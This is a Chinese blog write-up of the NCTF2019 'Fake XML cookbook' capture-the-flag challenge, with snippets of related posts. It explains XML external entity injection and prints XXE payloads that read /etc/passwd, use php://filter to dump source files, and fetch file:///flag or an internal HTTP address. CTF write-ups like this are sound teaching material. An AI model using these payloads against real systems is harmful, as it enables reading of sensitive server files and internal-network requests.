XXE漏洞 [NCTF2019]Fake XML cookbook1

已于 2023-12-17 21:01:12 修改
阅读量521 收藏 10
点赞数 6
文章标签: xml
于 2023-12-17 17:03:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/135045639
版权

打开题目

查看源代码

发现我们post传入的数据都被放到了doLogin.php下面

访问一下看看

提示加载外部xml实体

我们知道外部xml实体的格式是

<!ENTITY 实体名称 SYSTEM "URI/URL">

bp抓包一下看看

得到flag

或者这样

但是很明显这样是不行的,因为资源是在admin上,也就是用户名那里

PHP引用外部实体,常见的利用协议
file://文件绝对路径

如:

file:///etc/passwd

http://url/file.txt

php://filter/read=convert.base64-encode/resource=xxx.php

参数实体+外部实体

<!ENTITY % 实体名称 SYSTEM "URI/URL">

参数实体+外部实体

示例代码:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "file:///etc/passwd">

%file;

]>

%file(参数实体)是在DTD中被引用的,而&file;是在xml文档中被引用的。

最简单的xxe注入

 知识点源于:XML注入攻击总结_xml攻击-CSDN博客

从XML相关一步一步到XXE漏洞 - 先知社区

访白鹿
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行命令、引发拒绝服务...
[NCTF2019]Fake XML cookbook1
最新发布
whale_waves的博客
12-11 767
xml注入其实和sql注入类似,利用了xml的解析机制如果系统没有将‘’进行转义,那么攻击者就可以修改或者添加xml信息 例如: 这里是正常的注册的xml 用户输入 假如我添加一个呢,这样是否就将我们输入的用户名变成了权限 用户输入
[NCTF2019]Fake XML cookbook 1
weixin_44477223的博客
04-11 725
运用的知识点 XXE漏洞利用 题目 解题 不能用SQL注入,题目提示我们是XML。利用XXE漏洞 参考 从XML相关一步一步到XXE漏洞. 先抓包 构造PL <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username>
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)
小宇的web博客
02-18 4270
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题 乍一看像是sql注入,但是题目提示了是xml,这里就不考虑sql注入了。 先抓包看一下 这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入(被各种后端脚本调用) XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会
web buuctf [NCTF2019]Fake XML cookbook1
weixin_44214568的博客
03-31 680
考点:XXE(XML External Entity Injection 即XML外部实体注入) 1.界面 随便填入信息,进行抓包 2.分析请求头, 有x-requests-with,可以知道请求是ajax请求(ajax 全名asyncjavascript and XML(异步JavaScript和XML))也就是通过xml进行数据传输 https://xz.aliyun.com/t/6887#toc-0 抓包更改xml <?xml version="1.0" encoding..
SCAN_XXE:利用XML XXE漏洞
05-07
XML External Entity(XXEXML外部实体)漏洞是一种常见的安全问题,主要出现在处理XML输入的Web应用程序中。这种漏洞允许攻击者通过恶意构造的XML文档,来读取服务器的内部文件、执行系统命令或者进行DoS(拒绝...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
5、XXE漏洞pdf资料
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
网安小趴菜
09-25 609
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
[NCTF2019]Fake XML cookbook
Yang_99的博客
08-13 141
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://192.168.1.8"> ]> <user><username>&xxe;</username><password>asd</password></user> 先挖个坑,XML学习:https://xz.aliyun.c
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值